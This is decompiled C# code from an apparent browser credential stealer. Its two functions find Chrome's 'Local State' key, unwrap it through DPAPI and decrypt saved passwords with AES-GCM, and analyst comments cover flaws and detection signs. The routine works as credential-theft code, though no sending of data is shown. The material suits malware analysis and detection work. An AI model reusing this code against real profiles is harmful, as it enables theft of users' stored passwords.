예제 #1
        // Token: 0x06000080 RID: 128 RVA: 0x00006CC0 File Offset: 0x00004EC0
        /// <summary>
        /// Decompiled credential-recovery routine: turns a stored browser secret back into plaintext.
        /// Values tagged "v10" or "v11" are decrypted with AES-GCM, using a key read from the profile's
        /// "Local State" file and unwrapped through <c>DecryptAPI.DecryptBrowsers</c>. Any other value
        /// is handed directly to <c>DecryptAPI.DecryptBrowsers</c>.
        /// </summary>
        /// <param name="password">The encrypted value, carried as a string and converted to bytes with <c>Encoding.Default</c>.</param>
        /// <param name="browser">A path whose directory is the starting point of the "Local State" search.</param>
        /// <returns>
        /// The decrypted text, or the literal "failed (AES-GCM)" / "failed (DPAPI)" when the matching
        /// decryption step throws.
        /// </returns>
        /// <remarks>
        /// Review notes (defender view):
        /// - The key lookup and unwrap (file read, token scan, Base64 decode) sit outside any try block,
        ///   so a missing "Local State" file surfaces as an exception to the caller, not as a "failed" string.
        /// - Both decryption paths depend on the DPAPI wrapper, which presumably succeeds only in the
        ///   security context of the profile's owner. Confirm against the wrapper's P/Invoke declaration.
        /// - Observable behaviour for detection: a process other than the browser reading a profile's
        ///   "Local State" file and then calling DPAPI. The two "failed (...)" literals are static strings
        ///   in the binary.
        /// </remarks>
        public static string decryptChrome(string password, string browser = "")
        {
            // "v10"/"v11" prefix selects the AES-GCM path; everything else falls through to plain DPAPI below.
            if (password.StartsWith("v10") || password.StartsWith("v11"))
            {
                string   path  = "";
                // Candidate locations for "Local State": the directory of `browser`, its parent, its grandparent.
                string[] array = new string[]
                {
                    "",
                    "\\..",
                    "\\..\\.."
                };
                foreach (string str in array)
                {
                    path = Path.GetDirectoryName(browser) + str + "\\Local State";
                    if (File.Exists(path))
                    {
                        break;
                    }
                    // Not found at this level; path is left null if no candidate exists.
                    path = null;
                }
                // With path == null this call throws, and nothing here catches it.
                string   text   = File.ReadAllText(path);
                // No JSON parser is used: the file is split on double quotes and scanned for the key name.
                string[] array3 = Regex.Split(text, "\"");
                int      num    = 0;
                foreach (string a in array3)
                {
                    if (a == "encrypted_key")
                    {
                        // Two tokens after the key name (skipping the separator token between the quotes) is taken as the value.
                        text = array3[num + 2];
                        break;
                    }
                    num++;
                }
                // Base64-decode the value, drop its first five characters (presumably the "DPAPI" tag
                // Chromium puts in front of the wrapped key; confirm against a sample file), then unwrap
                // it with the DPAPI wrapper and no extra entropy. The bytes make a round trip through an
                // Encoding.Default string on the way.
                byte[] key = DecryptAPI.DecryptBrowsers(Encoding.Default.GetBytes(Encoding.Default.GetString(Convert.FromBase64String(text)).Remove(0, 5)), null);
                try
                {
                    // Layout after the 3-character tag: 12 characters passed as the third Decrypt argument
                    // (presumably the GCM nonce), then the remainder as ciphertext. AesGcm256 is defined elsewhere.
                    string s     = password.Substring(3, 12);
                    string s2    = password.Substring(15);
                    byte[] bytes = Encoding.Default.GetBytes(s);
                    return(AesGcm256.Decrypt(Encoding.Default.GetBytes(s2), key, bytes));
                }
                catch
                {
                    // Any failure in slicing or decryption is reduced to this marker string.
                    return("failed (AES-GCM)");
                }
            }
            string result;

            try
            {
                // Untagged path: the whole value is treated as a DPAPI blob.
                result = Encoding.Default.GetString(DecryptAPI.DecryptBrowsers(Encoding.Default.GetBytes(password), null));
            }
            catch
            {
                result = "failed (DPAPI)";
            }
            return(result);
        }
예제 #2
        // Token: 0x06000003 RID: 3 RVA: 0x000024D4 File Offset: 0x000006D4
        /// <summary>
        /// Decompiled wrapper around the <c>CryptUnprotectData</c> P/Invoke: copies the ciphertext and the
        /// optional entropy into unmanaged memory, calls the API, and returns the output blob as a managed array.
        /// </summary>
        /// <param name="cipherTextBytes">The protected blob; null is replaced by an empty array.</param>
        /// <param name="entropyBytes">Optional entropy; null is replaced by an empty array.</param>
        /// <returns>The bytes of the output blob, or an empty array when any step throws.</returns>
        /// <remarks>
        /// Review notes (defender view):
        /// - The P/Invoke declaration is not shown here; the argument roles described below assume it
        ///   mirrors the native parameter order. Confirm against the declaration.
        /// - The return value of <c>CryptUnprotectData</c> is not checked and every exception is swallowed,
        ///   so a caller sees only an empty array on failure and the sample itself emits no error detail.
        /// - A zeroed prompt struct together with flags value 1 (presumably CRYPTPROTECT_UI_FORBIDDEN)
        ///   would mean the call never shows UI to the logged-on user.
        /// </remarks>
        public static byte[] DecryptBrowsers(byte[] cipherTextBytes, byte[] entropyBytes = null)
        {
            // dataBlob = output, dataBlob2 = ciphertext input, dataBlob3 = entropy input (by position in the call below).
            DecryptAPI.DataBlob dataBlob  = default(DecryptAPI.DataBlob);
            DecryptAPI.DataBlob dataBlob2 = default(DecryptAPI.DataBlob);
            DecryptAPI.DataBlob dataBlob3 = default(DecryptAPI.DataBlob);
            // Prompt struct with no flags, no owner window and no prompt text.
            DecryptAPI.CryptprotectPromptstruct cryptprotectPromptstruct = new DecryptAPI.CryptprotectPromptstruct
            {
                cbSize        = Marshal.SizeOf(typeof(DecryptAPI.CryptprotectPromptstruct)),
                dwPromptFlags = 0,
                hwndApp       = IntPtr.Zero,
                szPrompt      = null
            };
            // Passed by ref in the description slot; its value is never read afterwards.
            string empty = string.Empty;

            try
            {
                try
                {
                    if (cipherTextBytes == null)
                    {
                        cipherTextBytes = new byte[0];
                    }
                    // Marshal the ciphertext into an unmanaged buffer described by dataBlob2.
                    dataBlob2.pbData = Marshal.AllocHGlobal(cipherTextBytes.Length);
                    dataBlob2.cbData = cipherTextBytes.Length;
                    Marshal.Copy(cipherTextBytes, 0, dataBlob2.pbData, cipherTextBytes.Length);
                }
                catch
                {
                    // Allocation or copy failure is ignored; the API is still called with whatever dataBlob2 holds.
                }
                try
                {
                    if (entropyBytes == null)
                    {
                        entropyBytes = new byte[0];
                    }
                    // Same marshalling for the entropy blob.
                    dataBlob3.pbData = Marshal.AllocHGlobal(entropyBytes.Length);
                    dataBlob3.cbData = entropyBytes.Length;
                    Marshal.Copy(entropyBytes, 0, dataBlob3.pbData, entropyBytes.Length);
                }
                catch
                {
                    // Ignored, as for the ciphertext blob above.
                }
                // Result code is discarded; success is inferred only from the output blob.
                DecryptAPI.CryptUnprotectData(ref dataBlob2, ref empty, ref dataBlob3, IntPtr.Zero, ref cryptprotectPromptstruct, 1, ref dataBlob);
                byte[] array = new byte[dataBlob.cbData];
                Marshal.Copy(dataBlob.pbData, array, 0, dataBlob.cbData);
                return(array);
            }
            catch
            {
                // Any exception falls through to the empty-array return after the finally block.
            }
            finally
            {
                // Release the output buffer and both input buffers if they were set.
                if (dataBlob.pbData != IntPtr.Zero)
                {
                    Marshal.FreeHGlobal(dataBlob.pbData);
                }
                if (dataBlob2.pbData != IntPtr.Zero)
                {
                    Marshal.FreeHGlobal(dataBlob2.pbData);
                }
                if (dataBlob3.pbData != IntPtr.Zero)
                {
                    Marshal.FreeHGlobal(dataBlob3.pbData);
                }
            }
            return(new byte[0]);
        }